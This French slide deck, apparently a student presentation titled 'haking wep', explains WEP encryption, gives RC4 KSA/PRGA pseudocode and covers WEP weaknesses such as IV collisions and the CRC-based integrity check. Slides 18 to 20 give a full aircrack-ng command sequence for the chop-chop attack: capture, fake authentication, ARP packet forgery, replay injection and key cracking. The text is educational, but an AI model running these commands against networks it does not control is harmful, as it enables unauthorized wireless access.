Clé WEP 
AFIFI FAISSAL
• Type de réseau 
– LAN (Local Area Network) 
– MAN (Metropolitan Area network) 
– WAN (Wide Area Network) 
• Qu’est ce qu’un réseau Wi-Fi? 
– Ondes radioélectriques 
– Standards 802.11
TCP/IP
WEP(Wired Equivalent Privacy) 
• Qu’est ce que le WEP? 
– Fait partie de la norme internationale IEEE 802.11 
– Une solution de confidentialité équivalente à un réseau 
filaire 
– Employé dans un WLAN pour : 
» La confidentialité 
» L’authentification 
» L’intégrité
WEP(Wired Equivalent Privacy) 
• Il est défini comme : 
– assez for: pour les clés longue (brute force) 
– à synchronisation automatique: les paquets sont autonomes 
– efficace : rapides (chiffrement et déchiffrement) 
– normalement exportable : longueur de clé variable 
– optionnel : l’utilisation du WEP est optionnel
Le chiffrement WEP 
• Il repose sur l’algorithme à clé symétrique RC4 
• Le chiffrement se décompose en plusieurs 
phases : 
– La création de la graine :IV+clé 
– La création du keystream 
– Le calcul ICV « Integrity Check Value » 
– La constitution du message final et son encapsulation dans 
une trame
L’algorithme RC4 dans WEP 
RC4 
– Symétrique 
– Chiffrement par flux 
– Différentes tailles de clé jusqu’à 256 bit 
– Il est extrêmement rapide 
Fonctionement 
• On génère un flux de données de taille identique au 
flux de données claires et on fait un XOR entre les 
deux
Initialisation de la clé 
• Deux longueurs de clé WEP 
– Clé (40 bits, soit 5 octets ) + IV = 64 bits 
– Clé (104 bits, soit 13 octets) + IV = 128 bits 
Graine 
IV : vecteur d’initialisation est une séquence de bits qui change régulièrement
Table «S» initialisée 
Mélange du tableau KSA 
pour i de 0 à 255 faire 
T[i]=i 
fin pour 
y ← 0 
pour x de 0 à 255 faire 
y ← y + T[x] + S[x] (modulo 256) 
T[x] ↔ T[y] 
fin pour
Pseudo Random Generator Algorithm PRGA 
PRGA(T) : 
x ← 0 
y ← 0 
x ← x+1 
y ← y+T[x] 
T[x] ↔ T[y] 
z ← T[x] + T[y] (modulo 256) 
renvoie T[z] 
Obtention du keystream =>
Opérations de chiffrement et de 
déchiffrement
LES FAILLES DU WEP 
• Social-Engineering 
• cryptanalyse
Les principales failles du WEP sont 
essentiellement les suivantes : 
• Les algorithmes de vérification d’intégrité et d’authentification 
sont très facilement contournables. 
• Possibilité de construire des dictionnaires fournissant en fonction 
d’un IV, le keystream. 
• L’algorithme de chiffrement RC4 présente des clés faibles et 
l’espace disponible pour les IV est trop petit. 
• 
• Une même clé est utilisée pour tout le réseau et les clés de 
chiffrement sont statiques . 
• Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop 
simples (attaque par dictionnaire)
Les faiblesses du IV 
IV moins de 17 millions de combinaisons 
forte possibilité de Collisions 
Sniffer le réseau : ETHEREAL, WIRESHARK (la 
carte Wi-Fi en mode monitor)
Attaques contre le WEP 
L’attaque chop-chop 
• Le WEP utilise un contrôle de redondance cyclique ICV 
• Le CRC permet de s’assurer de l’intégrité des données mais en 
aucun cas de leur sécurité 
• L’attaque chop-chop va donc utiliser cette faiblesse pour 
injecter des paquets sur le réseau.
Trame1 Trame 2 
ajout 1 octet 
de données 
_____ DATA ___ ___ICV ___ 
D0 D1 D2 D3 D4 I3 I2 I1 I0 
+ + + + + + + + + 
K0 K1 K2 K3 K4 K5 K6 K7 K8 
= = = = = = = = = 
R0 R1 R2 R3 R4 R5 R6 R7 R8 
_____ DATA ____ ___ICV ___ 
D0 D1 D2 D3 D4 D5 J3 J2 J1 J0 
+ + + + + + + + + + 
K0 K1 K2 K3 K4 K5 K6 K7 K8 K9 
= = = = = = = = = = 
S0 S1 S2 S3 S4 S5 S6 S7 S8 S9 
Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la 
somme I3+D5 (1 chance sur 256). On note X = I3 + D5.
Suite L’attaque chop-chop 
scan des réseaux wifi 
airodump-ng -w out -c 10 --encrypt wep --bssid 
00:16:41:C9:E0:3F wlan0 
on se fait passer pour un client: fake authentification 
aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F 
-h 00:12:F0:6F:ED:38
L'attaque Chopchop 
aireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h 
00:12:F0:6F:ED:38 
=> resultat : 2 fichiers .cap et .xor 
Forger un paquet ARP avec Packetforge-ng 
packetforge-ng -0 -a 00:16:41:C9:E0:3F -h 
00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y 
.xor -w arp.cap
L'injection: Aireplay-ng -3, arp replay 
#aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h 
00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0 
Le crack de la clé wep avec Aircrack-ng 
#aircrack-ng out-01.cap
Attaques contre RC4
Implementation

haking wep

  • 1.
  • 2.
    • Type deréseau – LAN (Local Area Network) – MAN (Metropolitan Area network) – WAN (Wide Area Network) • Qu’est ce qu’un réseau Wi-Fi? – Ondes radioélectriques – Standards 802.11
  • 3.
  • 4.
    WEP(Wired Equivalent Privacy) • Qu’est ce que le WEP? – Fait partie de la norme internationale IEEE 802.11 – Une solution de confidentialité équivalente à un réseau filaire – Employé dans un WLAN pour : » La confidentialité » L’authentification » L’intégrité
  • 5.
    WEP(Wired Equivalent Privacy) • Il est défini comme : – assez for: pour les clés longue (brute force) – à synchronisation automatique: les paquets sont autonomes – efficace : rapides (chiffrement et déchiffrement) – normalement exportable : longueur de clé variable – optionnel : l’utilisation du WEP est optionnel
  • 6.
    Le chiffrement WEP • Il repose sur l’algorithme à clé symétrique RC4 • Le chiffrement se décompose en plusieurs phases : – La création de la graine :IV+clé – La création du keystream – Le calcul ICV « Integrity Check Value » – La constitution du message final et son encapsulation dans une trame
  • 7.
    L’algorithme RC4 dansWEP RC4 – Symétrique – Chiffrement par flux – Différentes tailles de clé jusqu’à 256 bit – Il est extrêmement rapide Fonctionement • On génère un flux de données de taille identique au flux de données claires et on fait un XOR entre les deux
  • 8.
    Initialisation de laclé • Deux longueurs de clé WEP – Clé (40 bits, soit 5 octets ) + IV = 64 bits – Clé (104 bits, soit 13 octets) + IV = 128 bits Graine IV : vecteur d’initialisation est une séquence de bits qui change régulièrement
  • 9.
    Table «S» initialisée Mélange du tableau KSA pour i de 0 à 255 faire T[i]=i fin pour y ← 0 pour x de 0 à 255 faire y ← y + T[x] + S[x] (modulo 256) T[x] ↔ T[y] fin pour
  • 10.
    Pseudo Random GeneratorAlgorithm PRGA PRGA(T) : x ← 0 y ← 0 x ← x+1 y ← y+T[x] T[x] ↔ T[y] z ← T[x] + T[y] (modulo 256) renvoie T[z] Obtention du keystream =>
  • 12.
    Opérations de chiffrementet de déchiffrement
  • 13.
    LES FAILLES DUWEP • Social-Engineering • cryptanalyse
  • 14.
    Les principales faillesdu WEP sont essentiellement les suivantes : • Les algorithmes de vérification d’intégrité et d’authentification sont très facilement contournables. • Possibilité de construire des dictionnaires fournissant en fonction d’un IV, le keystream. • L’algorithme de chiffrement RC4 présente des clés faibles et l’espace disponible pour les IV est trop petit. • • Une même clé est utilisée pour tout le réseau et les clés de chiffrement sont statiques . • Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop simples (attaque par dictionnaire)
  • 15.
    Les faiblesses duIV IV moins de 17 millions de combinaisons forte possibilité de Collisions Sniffer le réseau : ETHEREAL, WIRESHARK (la carte Wi-Fi en mode monitor)
  • 16.
    Attaques contre leWEP L’attaque chop-chop • Le WEP utilise un contrôle de redondance cyclique ICV • Le CRC permet de s’assurer de l’intégrité des données mais en aucun cas de leur sécurité • L’attaque chop-chop va donc utiliser cette faiblesse pour injecter des paquets sur le réseau.
  • 17.
    Trame1 Trame 2 ajout 1 octet de données _____ DATA ___ ___ICV ___ D0 D1 D2 D3 D4 I3 I2 I1 I0 + + + + + + + + + K0 K1 K2 K3 K4 K5 K6 K7 K8 = = = = = = = = = R0 R1 R2 R3 R4 R5 R6 R7 R8 _____ DATA ____ ___ICV ___ D0 D1 D2 D3 D4 D5 J3 J2 J1 J0 + + + + + + + + + + K0 K1 K2 K3 K4 K5 K6 K7 K8 K9 = = = = = = = = = = S0 S1 S2 S3 S4 S5 S6 S7 S8 S9 Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la somme I3+D5 (1 chance sur 256). On note X = I3 + D5.
  • 18.
    Suite L’attaque chop-chop scan des réseaux wifi airodump-ng -w out -c 10 --encrypt wep --bssid 00:16:41:C9:E0:3F wlan0 on se fait passer pour un client: fake authentification aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38
  • 19.
    L'attaque Chopchop aireplay-ng-4 wlan0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 => resultat : 2 fichiers .cap et .xor Forger un paquet ARP avec Packetforge-ng packetforge-ng -0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap
  • 20.
    L'injection: Aireplay-ng -3,arp replay #aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0 Le crack de la clé wep avec Aircrack-ng #aircrack-ng out-01.cap
  • 21.
  • 22.

Notes de l'éditeur

  • #8 Deux étapes sont nécessaires pour l’opération de chiffrement : • L’initialisation de la clé • La réalisation du cryptogramme (texte chiffré ou cyphertext)
  • #9  IV est de 24 bits, soit 224 valeurs possibles (transporter en claire ds les trames)
  • #16 Collision : avoir des trame chiffré avec la même clé , Facile à détecter vu que l’ IV circule en claire
  • #17  Le CRC permet de s’assurer de l’integrité des donnees mais en aucun cas de leur sécurité L’attaque chop-chop va donc utiliser cette faiblesse pou ´ r injecter des paquets sur le reseau.